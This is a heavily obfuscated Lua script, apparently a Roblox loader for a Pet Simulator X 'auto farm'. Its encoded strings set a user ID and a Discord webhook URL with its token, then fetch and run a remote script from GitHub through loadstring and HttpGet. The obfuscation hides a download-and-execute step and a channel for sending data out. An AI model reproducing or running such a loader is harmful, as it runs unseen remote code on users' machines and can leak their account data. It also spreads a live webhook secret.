--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v81,v19);v19=nil;v92=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(1637 -(1523 + 114)) -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v83-(v83%(569 -((523 -156) + 201))) ;end end else local v84=((1994 -(68 + 997)) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -((1552 -(226 + 1044)) + 595)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==((957 -(892 + 65)) + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -((266 -199) + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -95365)) + (v39 * (189 + (1019 -(802 + 150)))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -2)) then if (v47==(0 + 0)) then if (v46==0) then return v48 * (997 -(915 + 82)) ;else local v102=0 -(0 + 0) ;while true do if (v102==0) then v47=1 + 0 ;v45=0 -(772 -(201 + 571)) ;break;end end end elseif (v47==(3234 -(1069 + 118))) then return ((v46==(0 -(0 -0))) and (v48 * ((1 -0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((1037 -(814 + 45)) + (2082 -1237)) ) * (v45 + (v46/((3 -1)^(52 + 0)))) ;end if (v42==2) then v47=v20(v44,812 -(368 + 423) ,1169 -(116 + 1022) );v48=((v20(v44,100 -68 )==(19 -(10 + 8))) and  -(3 -2)) or (443 -(23 + 393 + 26)) ;v42=9 -6 ;end if (v42==(1 + 0)) then v45=1 -(0 + 0) ;v46=(v20(v44,439 -(145 + 293) ,20) * ((432 -(44 + 386))^((6319 -4801) -(998 + 488)))) + v43 ;v42=2;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(887 -(261 + 624))) then v52={};for v94=1, #v51 do v52[v94]=v2(v1(v3(v51,v94,v94)));end v50=(1751 -(760 + 987)) -1 ;end if ((1083 -(1020 + 60))==v50) then return v6(v52);end if (v50==(1424 -((2543 -(1789 + 124)) + 793))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=6 -4 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + (766 -(745 + 21)))) then return "";end end v50=1;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(0 -0)) then else local v88=0 + 0 ;while true do if (v88==1) then v53=1;break;end if (v88~=(0 -0)) then else v54=0 + 0 ;v55=nil;v88=561 -(306 + 254) ;end end end if ((1 + 2)~=v53) then else v60=nil;while true do local v96=0;local v97;while true do if (v96~=(1329 -(797 + 532))) then else v97=0;while true do if (v97~=(0 + 0)) then else local v104=0;while true do if (1==v104) then v97=1 -0 ;break;end if (v104~=(1467 -(899 + 568))) then else if (v54~=(6 -3)) then else local v156=1202 -(373 + 829) ;local v157;local v158;while true do if (v156==(1 + 0)) then while true do if (v157~=(0 -0)) then else v158=0;while true do if (v158==(603 -(268 + 335))) then for v176=1,v23() do v56[v176-(1131 -(369 + 761)) ]=v28();end return v58;end end break;end end break;end if (v156==(0 + 0)) then v157=290 -(60 + 230) ;v158=nil;v156=573 -(426 + 146) ;end end end if (2==v54) then local v159=0 + 0 ;while true do if (v159~=(239 -(64 + 174))) then else for v168=1,v23() do local v169=0 + 0 ;local v170;local v171;local v172;while true do if (v169~=(1456 -(282 + 1174))) then else v170=0;v171=nil;v169=337 -(144 + 192) ;end if (v169==(812 -(569 + 242))) then v172=nil;while true do if (v170~=(2 -1)) then else while true do if (v171~=(0 + 0)) then else v172=v21();if (v20(v172,1,1025 -(706 + 318) )~=0) then else local v187=0 + 0 ;local v188;local v189;local v190;local v191;while true do if (v187==(1253 -(721 + 530))) then while true do if (v188~=2) then else local v195=0 + 0 ;while true do if (v195~=(1272 -(945 + 326))) then else v188=7 -4 ;break;end if (v195==0) then if (v20(v190,2 -1 ,1 + 0 )~=1) then else v191[2 + 0 ]=v60[v191[2]];end if (v20(v190,1977 -(1913 + 62) ,2 + 0 )==(2 -1)) then v191[3]=v60[v191[1936 -(565 + 1368) ]];end v195=701 -(271 + 429) ;end end end if (v188~=3) then else if (v20(v190,3 + 0 ,3)==1) then v191[1504 -(1408 + 92) ]=v60[v191[4]];end v55[v168]=v191;break;end if ((1087 -(461 + 625))~=v188) then else local v197=1661 -(1477 + 184) ;local v198;while true do if ((1288 -(993 + 295))==v197) then v198=0;while true do if (v198~=(0 -0)) then else local v207=0 + 0 ;while true do if (v207==(1 + 0)) then v198=1172 -(418 + 753) ;break;end if (v207==(0 + 0)) then v191={v22(),v22(),nil,nil};if (v189==(0 + 0)) then local v208=529 -(406 + 123) ;local v209;while true do if ((0 + 0)==v208) then v209=1125 -(936 + 189) ;while true do if (v209~=(0 + 0)) then else v191[3]=v22();v191[1773 -(1749 + 20) ]=v22();break;end end break;end end elseif (v189==1) then v191[1616 -(1565 + 48) ]=v23();elseif (v189==(1 + 1)) then v191[3]=v23() -((1324 -(1249 + 73))^(10 + 6)) ;elseif (v189==(2 + 1)) then local v214=0;local v215;local v216;while true do if (v214==1) then while true do if ((1145 -(466 + 679))~=v215) then else v216=0 -0 ;while true do if (v216~=(0 -0)) then else v191[8 -5 ]=v23() -(2^(1916 -(106 + 1794))) ;v191[4]=v22();break;end end break;end end break;end if (v214~=(1092 -(975 + 117))) then else v215=0;v216=nil;v214=1876 -(157 + 1718) ;end end end v207=1 + 0 ;end end end if (v198==(1 + 0)) then v188=2;break;end end break;end end end if (v188~=(0 + 0)) then else local v199=0 -0 ;while true do if ((0 -0)~=v199) then else v189=v20(v172,5 -3 ,7 -4 );v190=v20(v172,118 -(4 + 110) ,590 -(57 + 527) );v199=1;end if ((1428 -(41 + 1386))~=v199) then else v188=2 -1 ;break;end end end end break;end if (v187~=(1 + 0)) then else local v192=103 -(17 + 86) ;while true do if (v192==0) then v190=nil;v191=nil;v192=1 + 0 ;end if (v192==(1 -0)) then v187=5 -3 ;break;end end end if (v187~=(166 -(122 + 44))) then else local v193=0 -0 ;while true do if (v193~=(1189 -(449 + 740))) then else v188=872 -(826 + 46) ;v189=nil;v193=1;end if (v193==(3 -2)) then v187=1;break;end end end end end break;end end break;end if (v170~=(0 + 0)) then else local v178=0;while true do if ((1 + 0)==v178) then v170=1 -0 ;break;end if (v178~=(65 -(30 + 35))) then else local v180=0 + 0 ;while true do if ((1 + 0)~=v180) then else v178=1258 -(1043 + 214) ;break;end if (v180~=(1898 -(260 + 1638))) then else v171=0;v172=nil;v180=3 -2 ;end end end end end end break;end end end v54=1215 -(323 + 889) ;break;end if (v159==(0 -0)) then local v166=0 -0 ;local v167;while true do if (v166~=(580 -(361 + 219))) then else v167=0;while true do if ((320 -(53 + 267))~=v167) then else local v175=0;while true do if (v175==1) then v167=1 -0 ;break;end if (v175==0) then for v181=1 + 0 ,v59 do local v182=0;local v183;local v184;local v185;local v186;while true do if (v182==2) then while true do if (v183~=(413 -(15 + 398))) then else local v194=1205 -(902 + 303) ;while true do if (v194~=0) then else v184=0;v185=nil;v194=983 -(18 + 964) ;end if (v194==(3 -2)) then v183=1;break;end end end if (v183~=(1 + 0)) then else v186=nil;while true do if ((1690 -(1121 + 569))==v184) then v185=v21();v186=nil;v184=1;end if (1==v184) then if (v185==(1 + 0)) then v186=v21()~=(214 -(22 + 192)) ;elseif (v185==(2 + 0)) then v186=v24();elseif (v185~=(686 -(483 + 200))) then else v186=v25();end v60[v181]=v186;break;end end break;end end break;end if (v182~=0) then else v183=0;v184=nil;v182=1464 -(1404 + 59) ;end if (v182~=1) then else v185=nil;v186=nil;v182=852 -(20 + 830) ;end end end v58[3 + 0 ]=v21();v175=1 -0 ;end end end if (v167==(766 -(468 + 297))) then v159=1;break;end end break;end end end end end v104=127 -(116 + 10) ;end end end if (v97~=(1 + 0)) then else if (v54==(739 -(542 + 196))) then local v118=0 -0 ;while true do if (v118==(1 -0)) then v60={};v54=1 + 1 ;break;end if (v118~=(0 + 0)) then else local v160=0 + 0 ;while true do if (v160~=(0 + 0)) then else v58={v55,v56,nil,v57};v59=v23();v160=1552 -(1126 + 425) ;end if (1~=v160) then else v118=1 + 0 ;break;end end end end end if (v54==(0 -0)) then local v119=405 -(118 + 287) ;local v120;local v121;while true do if (v119==(3 -2)) then while true do if (v120==(1121 -(118 + 1003))) then v121=0 + 0 ;while true do if (v121==(0 -0)) then v55={};v56={};v121=378 -(142 + 235) ;end if (v121==1) then v57={};v54=1;break;end end break;end end break;end if (v119~=0) then else v120=0;v121=nil;v119=1;end end end break;end end break;end end end break;end if (v53==(164 -(92 + 71))) then local v89=0 -0 ;while true do if (v89~=(0 + 0)) then else v56=nil;v57=nil;v89=978 -(553 + 424) ;end if (v89==1) then v53=3 -1 ;break;end end end if (v53~=(2 + 0)) then else local v90=0 -0 ;local v91;while true do if (v90==0) then v91=0;while true do if (v91==(1 + 0)) then v53=2 + 1 ;break;end if (v91~=(0 + 0)) then else local v103=0 + 0 ;while true do if ((0 -0)~=v103) then else v58=nil;v59=nil;v103=1;end if (v103==(2 -1)) then v91=2 -1 ;break;end end end end break;end end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v79[3]~=0 ;else v71=v79[3];end elseif (v80<=2) then v77[v79[2]]=v63[v79[3]];elseif (v80>3) then local v122=0;local v123;while true do if (v122==0) then v123=v79[2];v77[v123]=v77[v123](v13(v77,v123 + 1 ,v72));break;end end else v77[v79[2]]();end elseif (v80<=7) then if (v80<=5) then do return;end elseif (v80>6) then do return;end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=8) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>9) then local v127=v79[2];local v128=v77[v79[3]];v77[v127 + 1 ]=v128;v77[v127]=v128[v79[4]];else local v132=v79[2];local v133,v134=v70(v77[v132](v13(v77,v132 + 1 ,v79[3])));v72=(v134 + v132) -1 ;local v135=0;for v148=v132,v72 do v135=v135 + 1 ;v77[v148]=v133[v135];end end elseif (v80<=15) then if (v80<=12) then if (v80==11) then v77[v79[2]]=v79[3];else local v111=v79[2];v77[v111]=v77[v111](v13(v77,v111 + 1 ,v72));end elseif (v80<=13) then local v113=0;local v114;local v115;while true do if (v113==1) then v77[v114 + 1 ]=v115;v77[v114]=v115[v79[4]];break;end if (v113==0) then v114=v79[2];v115=v77[v79[3]];v113=1;end end elseif (v80>14) then v77[v79[2]]=v79[3];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=18) then if (v80<=16) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==17) then local v141=0;local v142;local v143;local v144;local v145;while true do if (v141==0) then v142=v79[2];v143,v144=v70(v77[v142](v13(v77,v142 + 1 ,v79[3])));v141=1;end if (v141==1) then v72=(v144 + v142) -1 ;v145=0;v141=2;end if (v141==2) then for v164=v142,v72 do local v165=0;while true do if (v165==0) then v145=v145 + 1 ;v77[v164]=v143[v145];break;end end end break;end end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=19) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>20) then v71=v79[3];else v77[v79[2]]();end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944022O0040E9100DEE4103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132343139373039373538342O3734333531382F394B2O4F53734679627642505373336D4F37464347565A5F3350486F524A2D5855656137356159546B4E7076576D33774B4835416151414B74624F526846576A6158466100153O00120B3O00013O0026083O000C000100020004013O000C0001001202000100033O001202000200043O00200A00020002000500120B000400064O0012000500014O0011000200054O000400013O00022O00140001000100010004013O001400010026083O0001000100010004013O00010001001202000100073O003006000100080009001202000100073O0030060001000A000B00120B3O00023O0004013O000100012O00053O00017O00",v9(),...);
